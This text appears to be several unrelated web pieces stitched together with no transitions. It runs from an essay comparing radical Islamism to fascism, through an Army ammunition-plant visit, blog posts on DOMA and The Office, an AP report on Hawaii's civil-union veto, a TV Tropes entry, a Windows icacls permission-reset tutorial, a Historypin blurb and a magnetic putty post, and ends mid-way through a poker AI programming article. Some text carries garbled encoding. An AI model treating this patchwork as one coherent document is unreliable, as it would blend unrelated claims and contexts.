This is peculiar because the various forms of radical Islamism represent the third major form of totalitarian ideology and politics in modern world history .
While it seeks to benefit from the pathos of Third Worldist rhetoric , its ideological themes have more in common with fascism and Nazism than with Marxism - Leninism .
One would think that here in Washington , its most natural and passionate opponents would be less the heirs of Ronald Reagan than of Franklin Roosevelt .
Now , over a year into the Obama administration , I hope we are at a moment when this irony will be modified , and the center - left will raise a clear and strong voice in the war of ideas with radical Islamism .
Twenty - four years ago , I published a book about some aspects of German ideologies that contributed to Nazi thought .
It was titled Reactionary Modernism : Technology , Culture and Politics in Weimar and the Third Reich .
The term “ reactionary modernism ” referred to Nazism ’s simultaneous rejection of liberal political and cultural modernity combined with enthusiasm for modern technology .
It described the way that the Nazis embraced the machine but remained true to what they regarded as the German soul .
They , along with the Italian Fascists and the Japanese dictatorship , all demonstrated that the embrace of modern technology did not necessarily mean the embrace of ideas about democracy , individual rights , and equality of all persons .
At that time , Ayatollah Khomeini , one of the most significant political and cultural reactionaries of the twentieth century , was using tape cassettes to call for the abandonment of Iranian modernity in favor of a society built on premodern religious notions .
The term " reactionary modernism " was equally applicable on September 11 , when Al Qaeda - trained engineering students flew jets into the World Trade Center and the Pentagon .
Today , Khomeini 's successors reject the modern world even as they race toward the possession of nuclear weapons .
Yet American liberals have been slow to place the reactionary nature of these extremists at the center of their analysis about the proper response .
Though political Islamism is not identical to Nazism and Fascism , the lineages and continuities are significant .
One of the most obvious continuities is hatred of the Jews and the anti-Zionism it inspires .
Islamists of various ideological camps all share in the conspiracy theorizing that was at the heart of Nazi ideology .
In their German - language propaganda aimed at a domestic audience , the Nazi propagandists claimed that “ international Jewry ” started World War II in order to exterminate the German people .
They publicly assured the German audience that they would exterminate the Jews before the Jews had a chance to exterminate them .
At the same time , in their Arabic - language propaganda for North Africa and the Middle East , Nazi propagandists claimed that the Jews had driven the United States into World War II in order to establish a Jewish state in Palestine , dominate the entire Middle East and destroy the religion of Islam .
The echoes of these arguments come across loud and clear in the Hamas covenant of 1988 , bin Laden ’s declaration of war against the “ Zionist - Crusader alliance , ” Ahmadinejad ’s calls to wipe out the state of Israel , and TV programs in Arab countries that reproduce new versions of anti-Semitic blood libels .
A second set of continuities lies in the rejection of cultural modernity , especially the extension of rights to women and homosexuals .
Fascism and Nazism in Europe were , in part , a reaction against efforts to bring about both .
Like the paramilitary organizations of the Fascist and Nazi street fighters , the Islamic terrorist organizations are also militant “ brotherhoods ” that celebrate an absurd but familiar cult of hyper - masculinity .
Where fascism and Nazism sought to restore the position of women to the subordinate status they held before World War I , the Islamists view the proper position of women as something out of pre-modern times .
Here again , the fundamentally reactionary nature of political Islamism is evident .
It is fitting that some of the bravest and most eloquent Muslim critics of the Islamists are women .
INDEPENDENCE , Mo. --
The second most senior man in the U.S. Army saw both the dedication and the challenges facing ammunition plant employees and the mission in general .
Vice Chief of Staff of the Army Gen. Peter W. Chiarelli visited the Lake City Army Ammunition Plant on July 14 .
" This is the first ammunition plant I 've ever been to in 38 years ( in the Army ) , " he said .
Personnel from the Joint Munitions and Lethality Life Cycle Management Command , Joint Munitions Command and the Program Executive Office - Ammunition , accompanied Chiarelli doing the almost three - hour tour .
Joint Munitions and Lethality Life Cycle Management Command Commander Brig .
Gen. Larry
Wyche set the tone for the visit during a 20 - minute pre-brief , while applauding the LCMC unity and the plant 's workforce dedication .
" Sir , I want you to take away from this briefing , we are truly a team .
Small caliber ammunition is big business .
Modernization funding has allowed us to meet significant demands .
Our industrial base is a national asset , and thanks to you and your ( Department of the Army ) staff for your help .
" And with that , the tour started first with the production lines of 7.62 mm and .50 caliber ammunition including its primer production .
" I'm kind of shock we have equipment from 1942 , " Chiarelli said when shown an equipment faceplate from that year .
" When do you get to a point where you need to replace that equipment ' " Chiarelli stood in shock that on a hot , humid day in mid-July plant employees did not work in air - conditioned spaces out on the production lines .
As the plant employees interacted with the machines in a beehive - like activity , Chiarelli said he understood the need for more modernization .
" What should my priorities be ' " he asked while looking at Wyche .
" When I look around I see a priority here .
In 38 years of experience we have a problem ( with outdated equipment and facility ) .
This ( mission ) is absolutely critical for us .
" Chiarelli also viewed the production lines of the new M855A1 5.56 mm Enhanced Performance Round bullet .
JMC
Command Sgt. Maj .
David Puig informed Chiarelli the bullet provides warfighters improved hard - target capability , more dependable , consistent performance at all distances , improved accuracy and reduced muzzle flash and a higher velocity .
The staff also stated the round will eliminate up to 2,000 tons of lead from the manufacturing process annually .
Other questions addressed and answered during the visit included Base Realignment and Closure issues affecting employees , demil of ammunition , and the importance of the vast array of partnerships with other contractors to produce a single bullet .
Or as Chiarelli said , " this is a million dollar slide , " when shown the electronic slide showing the different companies it takes to make a bullet .
Also attending the tour included Brig .
Gen. Jonathan A. Maddux , Program Executive Officer - Ammunition ; Chris Grassano and William Sanville , Program Managers - Maneuver Ammunition Systems ; Trish Huber , JMC Munitions Logistics Readiness Center director ; and Lake City AAP Commander Lt. Col. Christopher Day .
Following the tour , Wyche addressed the attendees .
" He 's seen some of the challenges and he 's seen the hard work our employees our doing , " he said .
Chiarelli said he was armed with new information on the value of not only Lake City but the other ammunition plants as well .
" I will take what I 've seen today and take this back to the ( Army ) programmers , " he said .
John Culhane sinks his teeth into the DOMA ruling :
The one new justification that the government raised was protection of the status quo .
The court demolished I mean , demolished this argument , noting that the “ status quo ” had been for the feds to recognize states ’ definitions of marriage , so that DOMA radically changed that status .
And the practice of recognizing , and deferring to , local law on marriage , had been unaltered throughout our history , even in especially contentious cases such as interracial marriage .
That practice , in turn , was grounded in the long - standing recognition that marriage and family law is one of the most fundamentally state law issues of all .
And Joe Carter wonders why my case for marriage equality has always been a conservative one .
That case is as follows : it is conservative not to eject people from the fabric and tradition of their own families ; it is conservative to support emotional and financial stability which the daily discipline of marriage fosters ; it is conservative not to balkanize citizens into groups based on identity ; it is conservative to discourage gay men and women from marrying straight men and women on false pretenses and then ending up in divorce ; it is conservative to include everyone into the social institutions that stabilize society ; it is conservative to promote mutual responsibility and care - giving to avoid too much dependence on government ; it is conservative not to trample states rights and amend the federal constitution when such things are grotesquely unnecessary ; it is conservative to adjust to social change by adapting existing institutions , like civil marriage , than inventing totally new and untested ones , like civil unions .
But Carter is n't listening .
He 's a Christianist , not a conservative .
For him , doctrine is what matters .
For Burke , unyielding doctrine in politics was the problem .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
Since it appears
The Office has every intention of continuing post - Steve Carell , there ’s been much speculation about what direction the show would then take .
Will it go the Kirstie Alley route and cast about for a new boss among popular suggestions like Michael Emerson , Portia De Rossi , or David Cross ?
Or would it simply sew up its ranks and place a greater emphasis on the rest of the cast ?
For what it ’s worth , writer / co- executive producer / co-star Mindy Kaling favors the “ promote from within ” strategy , and should she find her own secret desires to see Kelly Kapoor take over thwarted , she ’d most like to put Rainn Wilson ’s Dwight Schrute in Carell ’s chair , telling Entertainment Weekly , “ I ’d love to see Rainn Wilson in that position .
Dwight has become so nuanced — you actually care about him now .
I think if [ we did a good job laying the groundwork ] this coming season , he would be a fantastic boss . ”
However , Kaling is quick to acknowledge , “ But that ’s my dream .
It certainly has n’t been approved by people that are more powerful than me and who make those kinds of decisions . ”
You mean Internet commenters ?
Advertisement
Hawaii ’s governor on Tuesday vetoed legislation that would have permitted same - sex civil unions , ending months of speculation on how she would weigh in on the contentious , emotional debate .
Republican Gov. Linda
Lingle ’s action came on the final day she had to either sign or veto the bill , which the Hawaii Legislature approved in late April .
“ There has not been a bill I have contemplated more or an issue I have thought more deeply about during my eight years as governor than House Bill 444 and the institution of marriage , ” Lingle said at a news conference .
“ I have been open and consistent in my opposition to same - sex marriage , and find that House Bill 444 is essentially same sex marriage by another name . ”
ADVERTISEMENT
Had Lingle not vetoed it , the measure would have granted gay and lesbian couples the same rights and benefits that the state provides to married couples .
It also would have made Hawaii one of six states that essentially grant the rights of marriage to same - sex couples without authorizing marriage itself .
Five other states and the District of Columbia permit same - sex marriage .
Lingle ’s decision is expected to be the last say on the proposal this year , because state House leaders have said they wo n’t override any of Lingle ’s vetoes .
She said voters should decide the fate of civil unions , not politicians .
“ It would be a mistake to allow a decision of this magnitude be made by one individual or a small group of elected officials , ” Lingle said .
For weeks ,
Lingle heard emotional statements from both supporters and opponents of the bill .
On Tuesday , she invited leaders from both sides to her standing - room only news conference .
ADVERTISEMENT
Opponents of the measure , including many religious groups , erupted in cheers and hugs when the announcement was made .
“ What she did was very just , and I ’m very happy about it , ” said Jay Amina , 50 , of Waianae .
“ It sends a good message throughout the state of Hawaii Ã¢â‚¬â€ that our people here on the islands are standing for traditional marriage . ”
Supporters then shouted , “ We ’ll keep fighting ! ” and “ Let ’s go ! ”
The group of about 100 joined in singing “ We Shall Overcome . ”
ADVERTISEMENT
“ We had hoped the governor would do the right thing for civil rights an equality , ” Lee Yarbrough , of Honolulu , said while standing arm - in - arm with his partner .
“ This battle is far from over . ”
Earlier in the day , dozens of supporters had gathered for a daylong vigil in the state Capitol ’s ground - floor rotunda .
Others waved flags and held signs along a busy street , to the honks of passing vehicles .
ADVERTISEMENT
“ I want to be able to get married , ” said Elizabeth Kline , a 22 - year - old University of Hawaii student who quickly corrected herself to say she wants a civil union .
“ It ’s not marriage , but it ’s a step toward it . ”
A group of about 20 civil unions opponents raised their hands , closed their eyes and said blessings in front of the office doors of key lawmakers .
They wore white shirts in a show of unity and buttons declaring “ iVote , ” a promise of consequences come November if civil unions become law .
“ All we ’re doing is praying .
We ’re not waving signs or playing music ” like gay rights groups in the rotunda , said Dennis Arakaki , executive director for the Hawaii Family Forum .
ADVERTISEMENT
About 60 percent of the more than 34,000 letters , telephone calls , e-mails and other communications from the public to the governor asked her to veto the measure , the governor ’s aides said late last week .
The Aloha State has been a battleground in the gay rights movement since the early 1990s .
A 1993 Hawaii Supreme Court ruling nearly made Hawaii the first state to legalize same - sex marriage before voters overwhelmingly approved the nation ’s first “ defense of marriage ” constitutional amendment in 1998 .
The measure gave the Legislature the power to reserve marriage to opposite - sex couples .
Lawmakers responded by enacting a law banning gay marriage in Hawaii but left the door open for civil unions .
Last year , civil unions easily passed the House but stalled in the state Senate .
When legislators reconvened in January , it was passed in the Senate but shelved by House leaders until the final day of the legislative session .
ADVERTISEMENT
Lingle blasted Democrats for reviving the bill and “ manipulating the legislative process when it suits them . ”
“ The legislative maneuvering that brought House Bill 444 to an 11th - hour vote on the final day of the session … after the legislators led the public to believe that the bill was dead , was wrong and unfair , ” she said .
___
Associated Press writers Mark Niesse and Audrey McAvoy contributed to this report .
Mochila insert follows …
http://tvtropes.org/pmwiki/pmwiki.php/Main/LampshadeHanging
Sir Toby Belch : Is it possible ?
Fabian :
If this were played upon a stage now , I could condemn it as an improbable fiction .
Shakespeare , Twelfth Night , Act 3 , Scene IV
Is it possible ?
If this were played upon a stage now , I could condemn it as an improbable fiction .
Advertisement :
Lampshade Hanging ( or , more informally , " Lampshading " ) is the writers ' trick of dealing with any element of the story that threatens the audience 's Willing Suspension of Disbelief , whether a very implausible plot development , or a particularly blatant use of a trope , by calling attention to it and simply moving on .
This assures the audience that the author is aware of the implausible plot development that just happened , and that they are n't trying to slip something past the audience .
It also assures the audience that the world of the story is like Real Life : what 's implausible for you or me is just as implausible for these characters , and just as likely to provoke an incredulous response .
The creators are using the tactic of self - deprecatingly pointing out their own flaws themselves , thus depriving critics and opponents of their ammunition .
The Turkey City Lexicon refers to this flavor of Lampshade Hanging as a " Signal from Freud " , and reminds the author that if your characters are complaining about how stupid the latest plot development is , maybe your subconscious is trying to tell you something .
Advertisement :
On the other hand , Lampshade Hanging done well can make for an entertaining piece of Medium Awareness or momentary lack of Genre Blindness .
It can also be used to take care of Fridge Logic , without having to actually do anything .
For this reason , it can either be seen as making a bad movie even worse or as adding clever writing and humour .
This practice is also known as " hanging a clock on it " , " hanging a lantern on it " , or " spotlighting it " .
In the film industry it 's sometimes called " hanging a red flag " on something , after the screenwriting adage , " To hang a red flag on something takes the curse off of it , " meaning that to lampshade something decreases the negative effects it might otherwise have .
Teodolinda Barolini referred to this as " the Geryon Principle " in reference to how Dante narrates how unbelievable his " true " story is the more fantastical it gets .
We went with our title because it's the one used in the Mutant Enemy bullpen .
Advertisement :
Can also be combined with a Hand Wave , sometimes invoking an unreveal , to make explaining a plot inconsistency unnecessary .
When breaking internal consistency is deliberate this trope can be used to show that , yes , it is deliberate instead of a plot hole .
Can also be combined with an active attempt to avoid the trope , in which case the Lampshade Hanging turns into a Defied Trope .
Commonly seen in the self - aware shows that make up the Deconstructor Fleet ; rarely used in the presence of a Drop - In Character .
If large numbers of lampshades are hung , then the writers believe lampshades are Better Than a Bare Bulb , this trope 's Logical Extreme .
Hypocrisy Nod and Inspiration Nod are specific types of this .
Meta
Guy is the fellow who does this all the time .
Sometimes takes the form of This Is the Part Where .... Compare Discussed Trope , Postmodernism and Playing with a Trope .
No Fourth
Wall happens when characters not only discuss tropes , but the writers as well .
Not to be confused with Lampshade Wearing .
Once again , Lampshade Hanging is when attention is drawn to something that is so strange it threatens to break the Willing Suspension of Disbelief .
Leaning on the Fourth Wall is for things which make sense in the story but also have a second meaning outside of the story .
Try not to get these confused .
Example Subpages ;
Other Examples :
open / close all folders
Advertising
The Charmin Bears are infamous for their obsession with toilet paper .
However , on occasion they will acknowledge how strange their behavior can be .
Asian Animation
The Lamput episode " Martial Art " features a scene where Fat Doc 's speech is accompanied by Chinese subtitles reading " We 're talking gibberish " .
This lampshades how all the characters ' speech is Speaking Simlish .
Card Games
Shows up fairly often in the joke " Unglued " and " Unhinged " sets from Magic : The Gathering .
For example , Ow 's flavor text is " Have you ever noticed how some flavor text has no relevance whatsoever to the card it 's on ? "
Also shows up occasionally in the regular game .
Lightning bolt was a card introduced in the early generations , and is widely regarded as being overpowered .
It was never reprinted after the 4th edition ... until the 11th edition , with the flavor text , " The sparkmage shrieked , calling on the rage of the storms of his youth .
To his surprise , the sky responded with a fierce energy he'd never thought to see again . "
Munchkin basically exists to hang lampshades , not only on the tropes of the genres each version is parodying , but eventually on itself .
The " You start the game as a Level 1 human with no class " joke eventually morphed into " You start the game as Level 1 with no class and no style " and " You start the game as a Level 1 zombie with no Mojo ( as this is a zombie movie , nobody has any class . ) "
Radio
Spike Milligan must have been peddling lampshades when he wrote the latter episodes of The Goon Show .
The Jack Benny Program did this quite a few times with knowing winks about the commercials .
Jack Benny :
And now a word from our sponsor .
Take it , Don .
Don Wilson , the show 's MC : " Jell - o . "
Take it , Jack .
Adventures in Odyssey has been around for over twenty years , and it knows it .
Just to name one example , the narrator , Chris , ends every episode by giving the show 's address and listing the main credits for the episode .
The inevitable pokes at this have gone from prefacing it with a " ( Ready ? ) " in " Switch " , to having the show 's production team hijack it over her protests in " 500 " , which was topped in " Live at the 25 " when she led the entire audience in reciting it .
While the April Fools episode " I Slap Floor " has everyone acting comically out of character , it works in a few jokes about the show at large amid the wackiness : Connie and Eugene finally give in to their latent feelings for each other and decide to get married immediately .
" There 's no sense in a long , drawn - out , seemingly - never - to - end engagement . "
Whit denies any evidence that he 's losing it ( chiefly , giving terrible advice ) thusly :
Whit : Well , I - I 'll prove it to you .
Here — look at this , I came up with a new invention today .
It 's a flying machine , made out of a boat with oars .
And big helium balloons .
And a propeller !
Connie : [ unimpressed ]
Uh-huh .
Tom :
Why do n't you take a nap , Whit ...
Whit : [ regathering notes ]
Oh , yeah , well ... you 'll all be sorry , next time somebody falls off a clock tower !
Well , I - I 'll prove it to you .
Here — look at this , I came up with a new invention today .
It 's a flying machine , made out of a boat with oars .
And big helium balloons .
And a propeller !
We can use it to rescue people !
[ unimpressed ]
Uh-huh .
Why do n't you take a nap , Whit ...[ regathering notes ]
Oh , yeah , well ... you 'll all be sorry , next time somebody falls off a clock tower !
The Hitchhiker 's Guide to the Galaxy : The Infinite Improbability Drive .
Douglas Adams admitted that , having created a situation where anything that saved the heroes would be a Contrived Coincidence , the only possible solution was to point it out , and then have them rescued with a Nonsensoleum space - drive that created Contrived Coincidences .
Cabin Pressure , a BBC radio sitcom about a very small airline , featured Benedict Cumberbatch as one of the pilots , except for the first episode in Series
Three when he was unavailable and the part was taken by another actor .
This was lampshaded by the other characters discussing what they would do if one of the pilots was ill and deciding that they would think of something .
The replacement actor entered at this point and the flight attendant complimented him on how well he was looking ; only for the co-pilot to reply : " No , I think he looks exactly the same as always ! "
Roleplay
Destroy the Godmodder : Used often due the characters ' genre savvyness .
Upon the creepy dummy 's arrival : " What ?!
How is thing even on the field ?
It completely breaks the game ! "
This is prone to happen in PeabodySam , Andrewnuva 199 , and Brikman McStudz 's writing in Dino Attack RPG , especially whenever a Deadpan Snarker opens his / her mouth .
In a Darwin 's Soldiers prequel story , we get this quote : Shelton :
This simulation is a little unrealistic , is n?t it ?
Tinner :
What do you mean ?
Shelton :
Some enemy army invades the base ?
There 's no way that would ever happen .
This is a relatively common occurrence in Survival of the Fittest , both in and out of character , this exchange shows an example of ( IC ) lampshading .
Melina Frost : [ leader of a group called the " Poison Angels " ]
Go on then ... show him why we 're called the Poison Angles . [ sic ]
Jeff Marontate : [ a character facing the group ]
Poison Angles , huh ?
Oh , I 'll give you a whole new set of angles in a minute , my darling .
Tabletop Games
Infernum is a D20 system game set in its own unique spin on Fire and Brimstone Hell , with more than a few oddities .
One of the strangest is the river Cocytus , a river of " Grinding Uttercold Black Ice " ... which happens to emerge from a rift beneath Malebolge , a massive and eternally unstable range of volcanoes .
In the rulebooks , it 's mentioned that even the demons do n't know how something like this can happen , and House Zethu ( the House of Mad Scientists ) is stated as wanting desperately to solve that little riddle .
Warhammer / Warhammer 40,000 : For over 20 years and six editions of the game , the Snotlings have taken to the battlefield riding their pumpwagons , a complex , mechanical wagon driven by hordes of the little creatures turning cranks and gears .
How this contraption works has never really been explained , nor how it can be built by creatures with only no real intelligence ( sometimes described as about the level of demented puppies ) .
The latest version of their rules notes that not even the Orcs themselves understand how the snots can make it work ( although the Orc race in general make things function because they believe that it works , and so it does ) .
After the new Necrons codexes granted them the ability to teleport units across the field with some vehicles , new versions of the rule explicitly state that " a unit may never teleport more than once , no matter how clever your logic is " .
The Tau Empire has undergone several spheres of expansion and stages of technological progress , but inhabits a tiny sliver of space in the Galactic map .
Whilst they have triumphantly seen off the Imperium in the Damocles Crusade , it is openly stated that this is only because the Empire of Man has much bigger , scarier things to deal with , and chose not to waste any more resources on what essentially amounts to a somewhat overly large splinter in their little toe .
Visual Novels
Web Original
UPDATE :
I have released a new graphical user interface utility to reset the files permissions .
Try it out !
I was running Vista with two NTFS partitions ( C : and D : ) , then formatted C : partition and installed Windows 7 .
The second partition ( D : ) had some files security set on files and folders .
After Windows 7 was installed , some files on drive D : were not accessible anymore and I was getting “ Access Denied ” .
I tried to right - click / properties on the folders that were not accessible and changed their owner and changed permissions but still some folders were still inaccessible not matter what I did .
After some research , it turned out the tool “ cacls ” that allows one to display or change ACLs ( access control lists ) can help to reset ACLs .
In Windows 7 it is called “ icalcs ” .
To reset files permissions , follow these easy 3 steps :
Step 1 : Run “ cmd ” as Administrator .
Note : In MS Windows 8 and above , press the Win+X keys , then choose “ Command Prompt ( Admin ) ” .
Step 2 : Go to the drive or folder in question , for example :
CD /D D :
Step 3 : To reset all the files permissions , type :
icacls * /T /Q /C /RESET
That ’s it !
After that , the files permissions were reset and I could access them back again .
Very Important note :
Step 3 is irreversible .
Make sure you backup the permissions before you proceed !
It is possible that “ icacls ” might fail .
For that try to take ownership of the files first .
Just before Step ( 3 ) , please type the following command :
takeown /R /F *
Download the graphical utility instead !
Do you want to master Batch Files programming ?
Look no further , the Batchography is the right book for you .
Available in print or e-book editions from Amazon .
You might also like :
Share this : Facebook
Twitter
Email
Reddit
Like this : Like Loading ...
It ’s also a great way to get the different generations hanging out together over the family album .
The project aims to start millions of new conversations between old and young , motivating older people to share their history while younger people share their digital skills .
I also love this glimpse of 1970 ’s fashion in London and the crazy dodo in a pram ( or stroller ) .
It only just launched in Beta but the result so far is a fascinating snapshot of the changing face of local streets and well known landmarks , providing us all with a new perspective on historic moments .
But this is just the start !
Historypin has ambitions to become the world ’s largest user - generated communal archive of historic images and stories and anyone , anywhere can get involved .
Pictures have been provided from individuals as well as various national archives , including such diverse contributors as Selfridges , Marks & Spencer , the Royal Albert Hall and Arsenal FC .
It looks like it ’s time to grab a cup of tea , dust off the albums in the attic and take a trip down memory lane — then down Street View — with your grandma or grandpa .
Magnetic Thinking Putty is exactly what it sounds like if you replace ' Thinking ' With ' Silly ' : $ 14 magnetic silly putty .
BUT CAN IT STILL COPY THE FUNNIES ?!
Magnetic Thinking Putty takes regular " silly " putty and turns its awesomeness up to 11 .
Like any other putty , it can be stretched , bounced , molded , popped , and torn .
However , when this putty is in the presence of a magnetic field , it exhibits fascinating properties .
Millions of tiny micron - sized magnets are embedded in each handful of Magnetic Thinking Putty .
Use the included super - strong neodymium iron boron cube magnet to control the putty like a snake charmer .
There 's a time - lapse video of the putty swallowing its magnet after the jump , but be warned : it looks exactly like how I 've always imagined a lady 's parts .
Kidding .
No , no I 'm not either .
Admittedly , Magnetic Thinking Putty does sound fun , but I 've already taken the concept one step further : broken glass putty .
Here -- CATCH !
Haha -- NOT SO SILLY NOW IS IT ?
Hit the jump for a couple worthwhile videos .
Product Site
via
Magnetic Thinking Putty Makes Silly Putty Awesome Again [ ohgizmo ]
Thanks to Josh and amanda , who
By Mick West
This article was originally published in the “ Inner Product ” column in Game Developer Magazine , November 2005
I recently programmed the AI for the World Series of Poker , developed by Left Field Productions and published by Activision .
I started out thinking it would be an easy task .
But it proved a lot more complex than I initially thought .
This article for the budding poker AI programmer provides a foundation for a simple implementation of No - Limit Texas Holdem Poker AI , covering the basics of hand strength evaluation and betting .
By following the recipe set out here , you will quickly become able to implement a reasonably strong poker AI , and have a solid foundation on which to build .
I assume you are familiar with the basic terminology of poker .
TEXAS HOLDEM
The goal of any game playing AI is twofold .
The primary purpose is to allow the player to have a fun and enjoyable experience .
The secondary purpose , subordinate to the first , is to play a strong enough game to provide sufficient challenge to the majority of players in your intended audience .
POKER DATA TYPES
You will need an implementation of the following data types .
I 'm going to describe them at the bit / byte implementation level , leaving the high level abstraction up to you .
A " suit " is an integer in the range 0..3 , where 0 =Clubs , 1 =Diamonds , 2 =Hearts , 3 =Spades
A " rank " is an integer in the range 0..12 , where 0 = 2 ( deuce ) , 1 = 3 , 11 = King , 12 = Ace .
This is the cards in a suit arranged in rank order
A " card " is an integer in the range 0..51 , hence
card = suit * 13 + rank .
Suit = card/13
Rank = card%13
A " Hand " is a 52 bit data type , where each bit represents a single card .
This can be stored as four 16 bit words for ease of use , where each 16 bit word represents the potential cards in one suit ( using 13 of the 16 bits ) ( figure 1 )
A " Hand Type " is an integer representing the type of poker hand you have , where 0 = no pair , 1 = pair , 2 = two pair , 3 =trips , 4 =straight , 5 =flush , 6=full house , 7 =quads , 8 = straight flush .
ENCODING HAND VALUES
A " Hand Value " is a 32 bit integer representing the relative value or strength of any hand of cards .
By comparing two hand values , you can see which hand is stronger in a game of poker .
The hand value can conveniently be represented as a series of six 4 - bit nibbles , where the most significant nibble represents the Hand Type , then the next five nibbles represent the different ranks of the cards in the order of significance to the hand value .
( figure .
2 )
Example 1 : AH QD 4S KH 8C is a " no pair " hand type ( sometimes called a " high card " , or in this case " Ace high " ) .
So , the hand type nibble is set to 0 .
The remaining nibbles in the Hand Value are filled out with the ranks of the five cards in descending order .
( A , K , Q , 8 , 4 ) , which translated into rank indices : 12,11,10,6,2 ( or C, B , A,6,2 in hexadecimal ) , and when combined with the hand type ( 0 ) in the high nibble , gives us a 32 bit integer : 0x000CBA62 .
The individual suits of the cards are basically ignored in the final hand value .
The only time suit is significant is when it contributes to a flush .
Also , note the top two nibbles of the Hand Value are always zero .
Example 2 : 4D JD 3D 4C AD is a pair of fours , with Ace , Jack , Three kickers .
The hand type is a pair , ( type 1 ) , then the ranks follow , starting with the rank of the pair , then the ranks of the kickers , so 4 , A , J,3 , which gives us 0x0012C910 .
Example 3 : 7C , 6C , 5C , 4C , 3D is a straight ( type 4 ) .
More specifically it's a seven high straight .
The only rank of import here is the seven ( rank 5 ) .
So the hand value is encoded as 0×00450000 .
We save ourselves a bunch of instructions in ignoring the four low cards after we 've determined it is a straight .
Look at the resultant hand values of the above examples , you can clearly see how the better hands always have a higher hand value , making determining the wining hand a simple comparison .
CALCULATING HAND VALUES
What we now need is a function that takes a hand , and returns a hand value .
This involves determining the hand type , then inserting the nibbles for the hand ranks , as above .
A hand is four words ( clubs , diamonds , hearts , spades ) of 13 bits each .
13 bits can be arranged in just 8192 combination , which means we can accelerate the evaluation of a hand by pre-calculating 8 K tables of things like the number of bits set in a ( 13 bit ) word ( if you have five or more of the same suit , then you 've got a flush ) , or the highest card of any straight in the hand .
You can also pre-calculate a table of the highest five cards from a particular bit combination , which you can then use to set the kicker cards .
If you calculate ranks = ( hearts | diamonds | clubs | spades ) then the value ranks is a bit - field with a bit set for every card rank that you have at least one of .
The number of bits set here is the number of unique ranks you have .
We calculate the number of bits in each of hearts , diamonds , clubs and spades , and subtract the number of bits in the unique ranks , giving the number of duplicated ranks , to be used as the basis of determining what type of hand you have .
Example : if you have 2D AS AH 2C 2H , you can very quickly determine that you have five cards , that there are just two unique ranks , and hence you must have either a full house or four of a kind .
A few more simple tests will determine exactly what you have .
The entire evaluation function will consist of tests like this , gradually whittling down the possible hand types .
Since the function consists mostly of bitwise operations , table lookups and simple comparisons , it is going to be very fast .
It 's also very amenable to fine tuning optimization , and the exact implementation will depend on the target architecture .
You may be able to take advantage of some processor specific instructions to greatly improve the efficiency .
CALCULATING HAND STRENGTH
Hand strength is the probability that you will win the hand , given your hole cards , the community cards , and the opponents who remain in the hand .
Hand strength is a floating point number between 0.0 ( certain loss ) and 1.0 ( certain win ) .
For example , a HS of 0.33 means you have a 33 % chance of winning .
The easiest and most flexibly way of calculating the HS is to simulate the progress of the game a very large number of time , and count the number of those times you win .
Say you simulate the game 1,000 times , and in the simulation , you win 423 games , then you have a high degree of certainty of having an approximate HS of 423/1000 , or 0.423 .
The procedure for simulating a game is very simple :
Create a pack of cards
Set score = 0
Remove the known cards ( your hole cards , and any community cards )
Repeat 1000 times ( or more , depending on CPU resources and desired accuracy )
Shuffle the remaining pack
Deal your opponent 's hole cards , and the remaining community cards
Evaluate all hands , and see who has the best hands
If you have the best hand then
Add 1 / ( number of people with the same hand value ) to your score ( usually 1 )
End if
end repeat
Hand Strength = score / number of loops ( 1000 in this case ) .
To be more accurate , we have to run our simulation with people dropping out if they are dealt hole cards below a certain threshold .
In practice , the determination of if a player stays in or not in a simulation is a probabilistic function of the strength of their hole cards , their table position , their stack size , the blind size and their previous behavior .
For now we can just modify the simulation , so after dealing the opponents hole cards , remove any non-blind players with hole cards worse than , say , a pair of sixes .
While not particularly elegant , it will still give you a useful number .
POT ODDS
The pot odds number is the ratio of your bet or call to the size of the pot after you bet ( the amount you will win ) .
For example , if the bet is $ 20 , and there is $ 40 in the pot , then the pot odds are 20 / ( 20+40 ) = 0.333 .
RATE OF RETURN
Rate of return is the " on average " proportion of how much you will multiply your bet by , if you stay in the hand .
Rate of Return = Hand Strength / Pot Odds .
The base strategy we implement is to mostly stay in hands with a rate of return greater than 1 .
THE FOLD / CALL / RAISE DECISION
For each round of betting the computer needs to decide if it is going to fold , call or raise ( The FCR decision ) .
Ignoring the question for the moment of how much to raise for now , then given a Rate of Return ( RR ) , it 's possible to provide a very simple ( yet useful ) mapping between RR and FCR .
If RR < 0.8 then 95 % fold , 0 % call , 5 % raise ( bluff )
If RR < 1.0 then 80 % , fold 5 % call , 15 % raise ( bluff )
If RR < 1.3 the 0 % fold , 60 % call , 40 % raise
Else ( RR >= 1.3 ) 0 % fold , 30 % call , 70 % raise
If fold and amount to call is zero , then call .
Do n't pay too much attention to the precise percentages listed above , the numbers will depend on the way you calculate your hand strength , and you 'll want to vary them depending on which betting round you are in .
You will also want to vary these numbers to create players with different personalities .
Using this very simple mapping between the RR and the FCR decision can give you a surprisingly reasonable and entertaining player .
They will tend to play strong hands , they will occasionally bluff , they wo n't scare easy if their hand is good , and they will abandon weak hands when raised , and they will stick around on a reasonable chance of a flush or straight draw , making for entertaining gameplay .
The fact that none of the percentages is 100 % is also important .
That means you can never deduce the hand strength of your AI opponent based on their actions ( unless they fold , where the information does not really help you ) .
If they raise , then they could have any kind of hand strength - probably a good one , but it might be the 1 in 20 times when they are bluffing with a very weak hand .
STACK PROTECTION
The simple rules above work well when your stack of chips is large and the blinds are small .
However as your stack shrinks and the blinds increase then the amount of money you need to commit to stay in a hand can become a very substantial proportion of your stack .
Also , occasionally other players might go " all - in " , betting their entire stack of chips , so we need some logic to prevent the AI from making bad calls when short stacked .
Say you have AD , 2D and the flop is QC , KC , 2C .
So you have a pair of twos , but there is a possible flush out there .
There is $ 500 in the pot and the bet is $ 100 to stay in against two player , but it 's your last $ 100 .
The pot odds are 100/600 = 0.1666 , your hand strength is 0.297 , so your rate of return is about 1.8 .
So if you could play this situation over and over again you would make on average an 80 % profit each time .
However , it 's your last $ 100 , and you have about a 70 % chance of loosing everything .
Do n't make that bet !
To handle this we can use a simple heuristic , along the lines of :
" If my proposed bet will substantially commit my stack , then do n't do it unless I have a strong chance of winning "
which might be implemented in part by :
" if ( stack - bet ) < ( blind * 4 ) and ( HS < 0.5 ) then fold "
Meaning if the call would leave you with less than four times the big blind , then do n't call unless you have a greater than 50 % chance of winning .
Poker is a complex game , with a surprisingly large number of different types of situations like this that you have to handle somehow .
I recommend you have as few special cases as possible , as it reduced the risk of an exploit being introduced into the game via some obscure special case .
However , you should anticipate a number of heuristics ( rules of thumb ) being hard coded into the AI logic .
TESTING POKER AI
Playing a quick single table game of Texas Holdem takes around 30 minutes on average with human players .
